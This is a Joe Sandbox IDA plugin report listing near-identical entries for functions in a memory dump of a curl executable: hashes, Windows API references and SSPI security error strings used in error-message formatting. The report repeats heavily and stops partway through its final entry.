Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INVALID_PARAMETER
API String ID: 1435330505-1537070967
Opcode ID: 940f7868e7b2f42909865a993612ef6140e3dac1efdbf0aaf0a83290997d1c76
Instruction ID: 97551d803d65eb2aa8590142bf50bc141282b9fb42ea20a8fbd64083c2c5fe72
Opcode Fuzzy Hash: 940f7868e7b2f42909865a993612ef6140e3dac1efdbf0aaf0a83290997d1c76
Instruction Fuzzy Hash: 85112A35B14B4096E6619F20E4047DF7365F788B91F85413AEA8E42B96DF3CCA4BC750

Function 000000013F49ED1D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 000000013F49ED1D

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_ISSUING_CA_UNTRUSTED
API String ID: 1435330505-2125857805
Opcode ID: b396ffa8aee3047b3b09d96b7eeafa63f21bf61c18f9e5c8be944110db82078d
Instruction ID: 507973be68948e3760092cb81d72121c90c76c26c7af9a3dd84415bf1d6298ae
Opcode Fuzzy Hash: b396ffa8aee3047b3b09d96b7eeafa63f21bf61c18f9e5c8be944110db82078d
Instruction Fuzzy Hash: AB112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49ED11 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_INVALID_TOKEN, xrefs: 000000013F49ED11
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INVALID_TOKEN
API String ID: 1435330505-3630042646
Opcode ID: 686989267c888d7f23e32433200b644c839d46ceebeaf6b6b217fa87361fa506
Instruction ID: 0a4ce6d295c87aeba8f3d2a7e441bea1fbacf3770d9842d827d056fd3af36c1e
Opcode Fuzzy Hash: 686989267c888d7f23e32433200b644c839d46ceebeaf6b6b217fa87361fa506
Instruction Fuzzy Hash: 04112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EDAD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_NOT_OWNER, xrefs: 000000013F49EDAD
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NOT_OWNER
API String ID: 1435330505-85178166
Opcode ID: 7d8399ce0817d309106f839ca88abca59d46daa6eab85881ad7cab29fdf35604
Instruction ID: 524c6e0d5c7c50948e6bc2fbb6c2d206927efcae16e294d64043702f793f5658
Opcode Fuzzy Hash: 7d8399ce0817d309106f839ca88abca59d46daa6eab85881ad7cab29fdf35604
Instruction Fuzzy Hash: A2115A31B14B4086E6619F20E4047DF7365FB88B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49EDA1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_MUST_BE_KDC, xrefs: 000000013F49EDA1
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_MUST_BE_KDC
API String ID: 1435330505-421735889
Opcode ID: 9ae41c34381301365762b6a9648815fcdf839abd08a5db5f03464133a66dd26b
Instruction ID: 0ce754d208d07ac3d0351b3a70324d6371e1d38c782610f2593f15b3edad929a
Opcode Fuzzy Hash: 9ae41c34381301365762b6a9648815fcdf839abd08a5db5f03464133a66dd26b
Instruction Fuzzy Hash: 6D115A35B14B4086E6619F20E4047DF7365F788B51F80413AEA8A43B96DF3CCA4BC750

Function 000000013F49EDB9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 000000013F49EDB9

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_AUTHENTICATING_AUTHORITY
API String ID: 1435330505-3294358665
Opcode ID: 29aaa159e840c9834c68c2cfa6ff841cbdd10aca7092468762173caa3d137782
Instruction ID: 19e488f532d79d86d62761a7478de66ba840a30636ec06173ee0e4c86f555ac8
Opcode Fuzzy Hash: 29aaa159e840c9834c68c2cfa6ff841cbdd10aca7092468762173caa3d137782
Instruction Fuzzy Hash: 7F115A31B14B4086E6619F20E4047DF7365FB88B51F80413AEA8A42B96DF3CCA4BC750

Function 000000013F49EDC5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
SEC_E_NO_CREDENTIALS, xrefs: 000000013F49EDC5
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_CREDENTIALS
API String ID: 1435330505-2672095485
Opcode ID: bdc16241a4db5473303296a4d2af5f3dfd6d169c0f16b074dbce383baa27d7c0
Instruction ID: 8691a079663e31a3a3e5e3c35a233852cb2bf54daf478cc783c09f7df736ebfe
Opcode Fuzzy Hash: bdc16241a4db5473303296a4d2af5f3dfd6d169c0f16b074dbce383baa27d7c0
Instruction Fuzzy Hash: BF115A35B14B4086E6659F20E4047DF7365FB88B51F81413AEA8E42B96DF3CCA4BC710

Function 000000013F49EDDD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_NO_IP_ADDRESSES, xrefs: 000000013F49EDDD

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_IP_ADDRESSES
API String ID: 1435330505-2704457502
Opcode ID: e235f45c3e229ece7590dd75cafce70d832f86bc2ff7804f97a7be30f0d2bc89
Instruction ID: a9be00607a581a8f9ee7cd825402aaa4b6227f81b5cc3f7a6b1b7f2414bcb601
Opcode Fuzzy Hash: e235f45c3e229ece7590dd75cafce70d832f86bc2ff7804f97a7be30f0d2bc89
Instruction Fuzzy Hash: 58115A31B14B40C6E6619F20E4047DF7365FB88B51F81413AEA8A42B96DF3CCA4BC710

Function 000000013F49EDD1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_NO_IMPERSONATION, xrefs: 000000013F49EDD1

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_IMPERSONATION
API String ID: 1435330505-480010766
Opcode ID: 2e46b5d00165c9c9defe6e3bde39fddb1a5eac614a589c9d357c6a2cc8d9bd36
Instruction ID: e6f9481ba24d5fefd00763a3a336440b8cbf0d43b08ee56fecbe5712bd6dca22
Opcode Fuzzy Hash: 2e46b5d00165c9c9defe6e3bde39fddb1a5eac614a589c9d357c6a2cc8d9bd36
Instruction Fuzzy Hash: B4115A35B14B4086E6619F20E4047DF7365FB88B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49ED65 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 000000013F49ED65
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_UNKNOWN_ETYPE
API String ID: 1435330505-2300855807
Opcode ID: dd1ac629be1cd07c5373d2a5811cd7d8860cd33eaa1cb76954666a5eefee97bc
Instruction ID: e694c1f62ed785f65fba40509a052e49deb0201691cc21a14eb6b4bf09b0088d
Opcode Fuzzy Hash: dd1ac629be1cd07c5373d2a5811cd7d8860cd33eaa1cb76954666a5eefee97bc
Instruction Fuzzy Hash: 82115A35B14B40C6E6619F20E4047DF7365F788B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49ED7D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 000000013F49ED7D
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_MAX_REFERRALS_EXCEEDED
API String ID: 1435330505-2208301713
Opcode ID: 6b8486946659c8238f8ca053dcc9d18e3f13eeea38739b9ff9d4a0ceccabc4f4
Instruction ID: 341742ff8d9f9acc46ca868d4a05ca70a7086bd9184ac2427d29a16167a0ebfb
Opcode Fuzzy Hash: 6b8486946659c8238f8ca053dcc9d18e3f13eeea38739b9ff9d4a0ceccabc4f4
Instruction Fuzzy Hash: 0F115A35B14B4086E6619F20E4047DF7365F788B51FC0413AEA8A42B96DF3CCA4BC710

Function 000000013F49ED71 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_LOGON_DENIED, xrefs: 000000013F49ED71

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_LOGON_DENIED
API String ID: 1435330505-3139097263
Opcode ID: 710a176b6175d03d4d1190c66f5ab75de5512d9aa6ab26a5f5e39b0f7f4f0251
Instruction ID: 5e49e5c92592b3c3142e5bdd9c0ffcc0447d4466abb01d4abd83d6f4c35692cc
Opcode Fuzzy Hash: 710a176b6175d03d4d1190c66f5ab75de5512d9aa6ab26a5f5e39b0f7f4f0251
Instruction Fuzzy Hash: A1115A31B14B4086E6619F20E4047DF7365F788B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49ED89 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_MESSAGE_ALTERED, xrefs: 000000013F49ED89

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
